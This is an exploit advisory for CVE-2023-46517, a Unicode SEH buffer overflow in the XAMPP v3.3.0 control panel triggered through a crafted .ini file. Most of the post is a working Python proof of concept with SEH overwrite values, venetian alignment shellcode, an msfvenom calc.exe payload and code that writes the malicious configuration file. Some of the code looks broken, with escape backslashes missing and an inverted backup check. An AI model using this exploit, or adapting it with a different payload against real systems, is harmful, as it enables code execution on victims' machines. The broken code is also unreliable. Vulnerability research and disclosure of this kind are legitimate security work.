Authored by Talson

XAMPP version 3.3.0 .ini unicode + SEH buffer overflow exploit.

advisories | CVE-2023-46517

# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
# Date: 2023-10-26
# Author: Talson (@Ripp3rdoc)
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
# Version: 3.3.0
# Tested on: Windows 11
# CVE-2023-46517

##########################################################
# _________ _______ _ _______ _______ _ #
# __ __/( ___ )( ( ____ ( ___ )( ( /| #
# ) ( | ( ) || ( | ( /| ( ) || ( | #
# | | | (___) || | | (_____ | | | || | | #
# | | | ___ || | (_____ )| | | || ( ) | #
# | | | ( ) || | ) || | | || | | #
# | | | ) ( || (____//____) || (___) || ) | #
# )_( |/ |(_______/_______)(_______)|/ )_) #
# #
##########################################################

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit

# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/

# Greetingz to EMU TEAM (¬‿¬)⩙

from pwn import *
import shutil
import os.path

buffer = "x41" * 268 # 268 bytes to fill the buffer
nseh = "x59x71" # next SEH address — 0x00590071 (a harmless padding)
seh = "x15x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
padd = "x71" * 0x55 # padding

eax_align = "x47" # venetian pad/align
eax_align += "x51" # push ecx
eax_align += "x71" # venetian pad/align
eax_align += "x58" # pop eax -> eax = 0019e1a0
eax_align += "x71" # venetian pad/align
eax_align += "x05x24x11" # add eax,0x11002300
eax_align += "x71" # venetian pad/align
eax_align += "x2dx11x11" # sub eax,0x11001100 -> eax = 0019F3DC
eax_align += "x71" # venetian pad/align
eax_align += "x50" # push eax
eax_align += "x71" # pad to align the following ret
eax_align += "xc3"; # ret into eax?

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
# Payload size: 512 bytes
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
"AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
"Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
"myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
"JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
"KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
)

shellcode = buffer + nseh + seh + eax_align + padd + shellcode


check_file = os.path.isfile("c:xamppxampp-control.ini")

if check_file:

print("[!] Backup file found. Generating the POC file...")
pass
else:
# create backup
try:
shutil.copyfile("c:xamppxampp-control.ini", "c:xamppxampp-control.ini.bak")
print("[+] Creating backup for xampp-control.ini...")
print("[+] Backup file created!")
except Exception as e:
print("[!] Failed creating a backup for xampp-control.ini: ", e)

try:

# Create the new file
with open("c:xamppxampp-control.ini", "w", encoding='utf-8') as file:
file.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}

Debug=0
Debuglevel=0
Language=en
TomcatVisible=1
Minimized=0

[LogSettings]
Font=Arial
FontSize=10

[WindowSettings]
Left=-1
Top=-1
Width=682
Height=441

[Autostart]
Apache=0
MySQL=0
FileZilla=0
Mercury=0
Tomcat=0

[Checks]
CheckRuntimes=1
CheckDefaultPorts=1

[ModuleNames]
Apache=Apache
MySQL=MySQL
Mercury=Mercury
Tomcat=Tomcat

[EnableModules]
Apache=1
MySQL=1
FileZilla=1
Mercury=1
Tomcat=1

[EnableServices]
Apache=1
MySQL=1
FileZilla=1
Tomcat=1

[BinaryNames]
Apache=httpd.exe
MySQL=mysqld.exe
FileZilla=filezillaserver.exe
FileZillaAdmin=filezilla server interface.exe
Mercury=mercury.exe
Tomcat=tomcat8.exe

[ServiceNames]
Apache=Apache2.4
MySQL=mysql
FileZilla=FileZillaServer
Tomcat=Tomcat
[ServicePorts]
Apache=80
ApacheSSL=443
MySQL=3306
FileZilla=21
FileZill=14147
Mercury1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
Mercury6=143
Mercury7=2224
TomcatHTTP=8080
TomcatAJP=8009
Tomcat=8005
[UserConfigs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=

[UserLogs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
""")
print("[+] Created the POC!")

except Exception as e:
print("[!] Failed creating the POC xampp-control.ini: ", e)